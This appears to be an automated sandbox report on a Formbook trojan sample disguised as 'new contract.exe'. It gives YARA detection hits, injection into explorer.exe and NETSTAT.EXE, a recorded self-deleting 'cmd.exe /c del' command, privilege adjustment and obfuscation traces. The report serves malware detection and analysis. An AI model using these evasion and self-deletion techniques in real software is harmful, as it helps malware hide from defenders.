Source: 00000003.00000002.4142928612.000000000E4FB000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: new contract.exe PID: 7424, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: new contract.exe PID: 7648, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 7732, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: new contract.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fgEBeMUyhH7sZUUckO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: _0020.SetAccessControl
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: _0020.AddAccessRule
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: _0020.SetAccessControl
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: _0020.AddAccessRule
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: _0020.SetAccessControl
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs Security API names: _0020.AddAccessRule
Source: 0.2.new contract.exe.419def0.2.raw.unpack, fgEBeMUyhH7sZUUckO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fgEBeMUyhH7sZUUckO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/1@11/1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00681CFC GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle, 5_2_00681CFC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00681C89 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle, 5_2_00681C89
Source: C:\Users\user\Desktop\new contract.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\new contract.exe.log Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: new contract.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: new contract.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\new contract.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: new contract.exe ReversingLabs: Detection: 50%
Source: unknown Process created: C:\Users\user\Desktop\new contract.exe "C:\Users\user\Desktop\new contract.exe"
Source: C:\Users\user\Desktop\new contract.exe Process created: C:\Users\user\Desktop\new contract.exe "C:\Users\user\Desktop\new contract.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\new contract.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\new contract.exe Process created: C:\Users\user\Desktop\new contract.exe "C:\Users\user\Desktop\new contract.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE" Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\new contract.exe" Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Section loaded: iconcodecservice.dll Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: snmpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: new contract.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: new contract.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: netstat.pdbGCTL source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmp, new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: netstat.pdb source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmp, new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: new contract.exe, 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1808242227.0000000002F63000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1806702400.0000000002DB3000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: new contract.exe, new contract.exe, 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000003.1808242227.0000000002F63000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1806702400.0000000002DB3000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs .Net Code: U3QVC8bZLu System.Reflection.Assembly.Load(byte[])
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs .Net Code: U3QVC8bZLu System.Reflection.Assembly.Load(byte[])
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.cs .Net Code: U3QVC8bZLu System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041703B push ebx; retf 2_2_0041703C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_00416A52 push dword ptr [eax]; ret 2_2_00416A63
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_00405262 push ebx; ret 2_2_0040526F
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_004163E0 push ebp; ret 2_2_0041645B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0040A464 push es; retf 2_2_0040A466
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041D475 push eax; ret 2_2_0041D4C8
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041D4C2 push eax; ret 2_2_0041D4C8
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041D4CB push eax; ret 2_2_0041D532
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041D52C push eax; ret 2_2_0041D532
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041774A push cs; ret 2_2_0041774B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041AF82 push 00000074h; ret 2_2_0041AF8C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_015F225F pushad ; ret 2_2_015F27F9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_015F27FA pushad ; ret 2_2_015F27F9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016209AD push ecx; mov dword ptr [esp], ecx 2_2_016209B6
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_015F283D push eax; iretd 2_2_015F2858
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_015F1365 push eax; iretd 2_2_015F1369
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E6B02 push esp; retn 0000h 3_2_0E4E6B03
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E6B1E push esp; retn 0000h 3_2_0E4E6B1F
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E69B5 push esp; retn 0000h 3_2_0E4E6AE7
Source: C:\Windows\explorer.exe Code function: 3_2_0FB45B1E push esp; retn 0000h 3_2_0FB45B1F
Source: C:\Windows\explorer.exe Code function: 3_2_0FB45B02 push esp; retn 0000h 3_2_0FB45B03
Source: C:\Windows\explorer.exe Code function: 3_2_0FB459B5 push esp; retn 0000h 3_2_0FB45AE7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_006860DD push ecx; ret 5_2_006860F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031409AD push ecx; mov dword ptr [esp], ecx 5_2_031409B6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052703B push ebx; retf 5_2_0052703C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00515262 push ebx; ret 5_2_0051526F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_005263E0 push ebp; ret 5_2_0052645B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052D475 push eax; ret 5_2_0052D4C8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0051A464 push es; retf 5_2_0051A466
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052D4C2 push eax; ret 5_2_0052D4C8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052D4CB push eax; ret 5_2_0052D532
Source: new contract.exe Static PE information: section name: .text entropy: 7.83819492389617
Source: 0.2.new contract.exe.419def0.2.raw.unpack, SOwVvHMwinIr4CVPeB.cs High entropy of concatenated method names: 'Dispose', 'aI87mJBnb1', 'jKSqXh431R', 'm6ebbuCEuC', 'vyY7F10NkP', 'y1M7z1kJdj', 'ProcessDialogKey', 'mV5q8Nbj4n', 'K0dq71HYwv', 'nigqq3REnx'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, uf9aokYYeocPIOSosy.cs High entropy of concatenated method names: 'ekYAnEi5yt', 'g0kAMt1aRF', 'DEHuf1e4pw', 'UEMusKJwCK', 'ktHuKPGsns', 'R51u9myGsQ', 'KdkuJJqPRd', 'hhAuZSGJw2', 'IKcujRYdBA', 'tKIuxEF0Pj'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, QQTpKp75Qv0RWvQaoE.cs High entropy of concatenated method names: 'UxEOcxTPdk', 'NRMOX6GNmV', 'VwiOfIUlWg', 'xBfOsgDlPW', 'ysoO4sQIdk', 'VJZOKaADJj', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BdAaLxlyFpvWDFdhFt.cs High entropy of concatenated method names: 'xAQY3xZshw', 'HFmYh3i4mA', 'rKMYCGXLbN', 'Wy1YEoRtNZ', 'A4xYnnAa9B', 'k1BYGWcf2J', 'bjvYMw44ve', 'CKhY0diM9Y', 'XFLYPudrcb', 'gGgYw5EWNs'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs High entropy of concatenated method names: 'Bt4TLdUcQu', 'NHiTpK9ow5', 'KLoTainbXn', 'UAfTuWPf6S', 'nbdTAqCCuH', 'YnuTkX58rc', 'ViXTYrwlcv', 'skSTBbWqr4', 'zLITURJXrC', 'MUsTIR6eRE'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, zEP9MvkRynobcNIcT7.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nM2qmOa6TN', 'RNrqF2inTm', 'PWeqzEgHDs', 'jluT8iXvyd', 'YrfT7E6FHA', 'rqCTqhgHJH', 'NkFTTqIebR', 'LpuL7NOyBiKZJDjlnug'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, nBjC5FWVGlwu26wPqR.cs High entropy of concatenated method names: 'ToString', 'QReSiZuu4y', 'tCFSXZJvKP', 'FM7Sfjq6FD', 'zjWSsuVrCk', 'ycxSKIgBpu', 'E29S9TCIva', 'id8SJvdwbo', 'MFiSZXNZls', 'IiYSjmqc9h'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, AnPH1ZOKvPImGHJVl0j.cs High entropy of concatenated method names: 'RCcH3scGmw', 'q5xHhRknv7', 'RIOHCUqrdO', 'Qh0HEYwQTV', 'VkKHnN3V5P', 'HH6HGjXqWU', 'liNHMDD4II', 'EwcH08fCoX', 'zCEHPVLjvv', 'rwYHw8TvBQ'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, fwA2K7BTejKMW9QUlG.cs High entropy of concatenated method names: 'Qq4kLtvjhW', 'WtJkaxlmWT', 'B2WkAZDOhk', 'CxqkYGJIV6', 'JYFkBOQOrV', 't97AlKkZTO', 'Hj4AvGwvoY', 'WqqADNWdSO', 'QfgAQsOHNx', 'OjLAm3KyAJ'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, FgGUaas92i9EvJTkCy.cs High entropy of concatenated method names: 'vVjoQVpX5s', 'C8poFeSSU0', 'g2yO8KaRGx', 'hcEO7rbR1Q', 'aCIoibJ0mf', 'bxootaQUfj', 'DyHoWwJTXW', 'cyto4uNumR', 'e20o1B8B7O', 'xW3oRVrtFL'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, OZjAZMZljeJfRcMEoc.cs High entropy of concatenated method names: 'ObICTEYAi', 'O4fExnimc', 'cunGFxp3K', 'mcTM2YKpa', 'KogPXsH93', 'Y3ww4GSxf', 'CBEd6tAbdqUNqjg8ee', 'tJ3qr5N4cvKdWuy8m3', 'OOkOG436q', 'Bnq2i4aaJ'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, cxtTtGunxt5IjcA9tT.cs High entropy of concatenated method names: 'R79OpiWflb', 'wxJOalib1K', 'TeeOuSohhM', 'iLnOAZ07T7', 'OjvOkRDY9N', 'ub5OYVAyjP', 'V1uOB1R9pR', 'TEYOUFybLl', 'xqtOIysPJm', 'iAWOdiEKSM'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, p7xNqEzxIiFeSoxNuY.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a4gHNvH8qE', 'jpoHgrwLh0', 'nk5HSXwhke', 'A1jHojnBdT', 'OcaHOrdgXk', 'Da4HHgDP09', 'mCfH291rO2'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, fgEBeMUyhH7sZUUckO.cs High entropy of concatenated method names: 'P53a4tNGPQ', 'QJLa1gleOS', 'QVRaRFxdt7', 'Cdxa59UVsr', 'bLSaluw5ed', 'JPAavJKSOf', 'UetaDvsP9X', 'yYYaQTDYbd', 'CTpam4JgxZ', 'cQDaFINaKP'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, zUws5HLCWDAIg0bvex.cs High entropy of concatenated method names: 'B2m7YMurfq', 'CtG7BU1pCS', 'BVr7IBy4gq', 'EcM7djjGJ3', 'ITY7glNjID', 'OZ37SZnApN', 'RQHLujujtC9OjhZxtH', 'DH6bVA9jcjNSmwxDaO', 'lDG77EqoZH', 'MA67TBJpmh'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, nNEK9grHOYMabirkn9.cs High entropy of concatenated method names: 'ujIoItZi25', 'SGGodoKJEL', 'ToString', 'rfOopVlZlm', 'KRxoavNDmw', 'hcrouVlpIW', 'THuoAg4jRl', 'h24ok8B1fG', 's46oY1JZR0', 'tMFoB1aDiS'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, fbgZAVOvkt4qOAMZfXo.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qLf24Ir8wS', 'NGK21E1qOX', 'RxZ2RSfmla', 'rFY25LrKK1', 'Vs12lZHDNb', 'Oqv2vBl4Pm', 'iVm2DFQKy2'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, UCFEImOOnS2ah0fT7nc.cs High entropy of concatenated method names: 'ToString', 'KL72TGf78t', 'DZ52VkL8Af', 'JNM2LdqlLM', 'gnp2psu8UG', 'bce2aM0kH3', 'xbf2uOCuKA', 'vEl2AABmK1', 'sE7BOo1IqYogjtGB4KC', 'miSiqq1qGpFXkZNcdkF'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, J7QEFHaSxHRZs0TFi6.cs High entropy of concatenated method names: 'jADH7uvKgG', 'ld0HTJ5aLB', 'NSUHVeSZWw', 'EKHHpxjwIN', 'IZPHaFFwsr', 'S8lHAtKT73', 'TD4HkDQMuR', 'ufhOD8HcxP', 'lePOQUHIV1', 'BaPOm3UsHC'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, aDjYvCEF62E4IZYMPn.cs High entropy of concatenated method names: 'UL1N0O4gTW', 't09NPdXcXf', 'ctRNcyAufi', 'UhINXQmb4n', 'RqYNsIQR0T', 'AacNKVbLuc', 'RKXNJmwcNm', 'SpPNZYtvo6', 'judNxAZ15u', 'djSNiYt2OE'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, y5AhBBpbkCOrjXLQSY.cs High entropy of concatenated method names: 'DqvYpIC0u9', 'OVxYuH61ux', 'EvkYkOKQZd', 'oeEkFYSIKM', 'pv1kz4KwAA', 'soAY89N83I', 'WPlY7IbfBE', 'edQYqsqiW2', 'kgSYTaxmvn', 'TOKYVXv6jQ'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, SQA3X2yg9UeEuDdc7y.cs High entropy of concatenated method names: 'rSDuEJHf9M', 'wpOuGSOAvV', 'Tlru0y0hIu', 'pLBuPXtVcM', 's7Augqus3c', 'CaSuS1YTis', 'xYyuoF6iuu', 'UEduOTjQBp', 'MMguH079jO', 'aIhu2iid4o'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, el3wNP0WoRTZbNZSWq.cs High entropy of concatenated method names: 'MRxDNSZaKKuO7aBnuSr', 'smJafGZQ9yBPJn5jG3F', 'WXoN05ZiRTBBLSGJUTr', 'NNmkONbAE7', 'Im1kHWj8do', 'ND9k25D4bi', 'CQ7VVrZ2m33H4UGXLOX', 'ea8GMeZHAWPYgAafnKV'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, SOwVvHMwinIr4CVPeB.cs High entropy of concatenated method names: 'Dispose', 'aI87mJBnb1', 'jKSqXh431R', 'm6ebbuCEuC', 'vyY7F10NkP', 'y1M7z1kJdj', 'ProcessDialogKey', 'mV5q8Nbj4n', 'K0dq71HYwv', 'nigqq3REnx'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, uf9aokYYeocPIOSosy.cs High entropy of concatenated method names: 'ekYAnEi5yt', 'g0kAMt1aRF', 'DEHuf1e4pw', 'UEMusKJwCK', 'ktHuKPGsns', 'R51u9myGsQ', 'KdkuJJqPRd', 'hhAuZSGJw2', 'IKcujRYdBA', 'tKIuxEF0Pj'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, QQTpKp75Qv0RWvQaoE.cs High entropy of concatenated method names: 'UxEOcxTPdk', 'NRMOX6GNmV', 'VwiOfIUlWg', 'xBfOsgDlPW', 'ysoO4sQIdk', 'VJZOKaADJj', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BdAaLxlyFpvWDFdhFt.cs High entropy of concatenated method names: 'xAQY3xZshw', 'HFmYh3i4mA', 'rKMYCGXLbN', 'Wy1YEoRtNZ', 'A4xYnnAa9B', 'k1BYGWcf2J', 'bjvYMw44ve', 'CKhY0diM9Y', 'XFLYPudrcb', 'gGgYw5EWNs'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs High entropy of concatenated method names: 'Bt4TLdUcQu', 'NHiTpK9ow5', 'KLoTainbXn', 'UAfTuWPf6S', 'nbdTAqCCuH', 'YnuTkX58rc', 'ViXTYrwlcv', 'skSTBbWqr4', 'zLITURJXrC', 'MUsTIR6eRE'
